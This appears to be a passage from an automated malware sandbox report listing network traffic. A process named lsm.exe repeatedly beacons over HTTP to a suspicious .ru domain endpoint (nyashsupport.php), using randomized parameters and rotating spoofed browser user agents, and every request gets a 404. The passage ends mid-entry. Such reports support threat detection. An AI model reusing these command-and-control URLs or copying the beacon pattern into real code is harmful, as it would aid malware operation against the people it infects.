                              Date: Fri, 13 Sep 2024 17:30:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRTS09Bv8wRjgAIMjhO0DchgZJWgicGReApqFtgOpGL5a4rbF1HC%2B4xFr3Ox5qGCooyta2w8cJDsQOsHs1chjsVeV2KN5A8YYb66srqqhuTV5gV5WOHaNzxyQt7I9EbK6npbQByaMGt4WQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29de260de96551-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1
                              Accept: */*
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 81888.cllt.nyashteam.ru
                              Connection: Keep-Alive
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:31:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FslPOi3lAmZeEyjyrHWy7ZXgxXTWqfIi6EkaaF8HMy34RIyDAm6k2rYEyAamA47TuuBTG8RKWFWs29v%2FmDdpS5PLDDuDzzOYX96Bt7xjSsvcN0X%2BJnsGL7Uh2KscKP1cvAElnXPrKkl9gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29de84886fcd74-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1
                              Accept: */*
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 81888.cllt.nyashteam.ru
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:31:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tuat94oy%2BJxpmzthGN00exnDFhWh9310LO68TKochyVmq9%2BO0nrg0YrmLeyrl5ORHOg3RZVLxIp%2B8zw7BJSQR4b3ENHq4bYOwfvQ0DkcUWe7o9EvjGaN59%2FxW%2FDgT%2BsJJZt8jN6vVILK7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29de85ea22cd74-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe HTTP/1.1
                              Accept: */*
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                              Host: 81888.cllt.nyashteam.ru
                              Connection: Keep-Alive
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:31:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0FyyZl%2FeVasAO8K3XM%2BBs%2FBuqM5F%2Bwdt56di2jk7cV5ZMEPmo6Uz%2FyQXsRIKpusH3K4FzFNwhvYMYWNg0BwNYsw2DiFh6Nh1kkLPWH6EtvB2agN4yVRJVrzzZWBx2FTeRLzjm4mogLfCjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29dedd7988633a-LHR
                              alt-svc: h2=":443"; ma=60
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe HTTP/1.1
                              Accept: */*
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                              Host: 81888.cllt.nyashteam.ru
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:31:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWRmbTWlqxnWsVvhR9lDNnB0hznrRDvCmiQM8RYOvO5DnIU0XhvALP0SZwdV6OTsebJ3%2BtLhuw8d6hFZDlTy9DcoSuc%2BPWI%2FGd2CYLlBcJUOSXbxoal7a9T9fujxNJNNmzfzfLBCgNl%2BXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29dedf3c06633a-LHR
                              alt-svc: h2=":443"; ma=60
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR HTTP/1.1
                              Accept: */*
                              Content-Type: text/html
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: 81888.cllt.nyashteam.ru
                              Connection: Keep-Alive
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:31:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGHu1odNBj5PRkbaKJSoRpLsH5rQlok1uCLDA8ffnUtg8kT1HHqR5WXYeaOLknBtwcUncEjAcSaTLRXha0gmrItKh9Ly813P4cMrUiVdSoj3RPalGChRlpvaptm4lm6n5rH4zyAFv1RGcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29df555ddf63f4-LHR
                              alt-svc: h2=":443"; ma=60
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR HTTP/1.1
                              Accept: */*
                              Content-Type: text/html
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: 81888.cllt.nyashteam.ru
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:31:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9TpB2wNK0TAia25agoaz1TYj0q4Dn70G2wkty5AK64wzFCVvOkyM4Ss8bii29l0bAvsgVoYBnrIR4nIL3PVaH00B6wTJeF1WZTb%2Bn%2F5RCaP%2FJQ7SkN%2FbvIB5QbzL8hiqwfqlFPx2P4d9sA%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29df56cfb363f4-LHR
                              alt-svc: h2=":443"; ma=60
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ HTTP/1.1
                              Accept: */*
                              Content-Type: text/csv
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                              Host: 81888.cllt.nyashteam.ru
                              Connection: Keep-Alive
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:31:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2FOexPIIECULgMLN2HiTv5Y8MXSJK7VZJlwQISCK%2BwWs5%2FUDZ%2F3HqUSSDHppKolhBvOpB%2FWJKlGGq0xcg3kdgeW5FLe7RNBvi8sgIOR9kHmWkDsX94EJLBtzk8j8qUdOxLHOPVPi%2BhfOEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29dfbfcb8863c2-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ HTTP/1.1
                              Accept: */*
                              Content-Type: text/csv
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                              Host: 81888.cllt.nyashteam.ru
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:31:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3vo3P%2FwOmtcxYLye%2Bbd8C%2BxwHtRKDX8XzRur2R68YgFQvTFvew2MvusrXbXENqy1LVCeDrJ4a8%2FLE6U3X9Z8GIh4Pf6choOUJW0QZAUziBmT29a6JKu13Kiy%2BChDXQjNPDPBlanYNrh7eQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29dfc14dbc63c2-LHR
                              alt-svc: h3=":443"; ma=86400
                            • 104.21.2.8:80
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401
                              http
                              lsm.exe
                              1.3kB
                              1.5kB
                              7
                              7

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401

                              HTTP Response

                              404

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401

                              HTTP Response

                              404
                            • 104.21.2.8:80
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s
                              http
                              lsm.exe
                              1.3kB
                              1.5kB
                              7
                              7

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s

                              HTTP Response

                              404

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s

                              HTTP Response

                              404
                            • 104.21.2.8:80
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs
                              http
                              lsm.exe
                              1.3kB
                              1.5kB
                              7
                              7

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs

                              HTTP Response

                              404

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs

                              HTTP Response

                              404
                            • 104.21.2.8:80
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe
                              http
                              lsm.exe
                              1.3kB
                              1.5kB
                              7
                              7

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe

                              HTTP Response

                              404

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe

                              HTTP Response

                              404
                            • 104.21.2.8:80
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR
                              http
                              lsm.exe
                              1.5kB
                              1.5kB
                              7
                              7

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR

                              HTTP Response

                              404

                              HTTP Request

                              GET http://81888.cllt.nyashteam.ru/nyashsupport.php?EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&EeeMyIMUwQZyby072PMe9g0AMp=LoF6sjQQxCVmAWU9oCBXye&se4Zxioe9JbBqqUrOLhC5gmLHpg=8LR1ryX&xJcsJiWciVoSTVw=Qb4L1tR

                              HTTP Response

                              404
                            • 104.21.2.8:80
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&8Wan=9oyLDaB6scvLSMJxTQ7iQ7xuhy6mn&279rk=JetOkZ
                              http
                              lsm.exe
                              1.3kB
                              1.5kB
                              7
                              7

                              HTTP Request

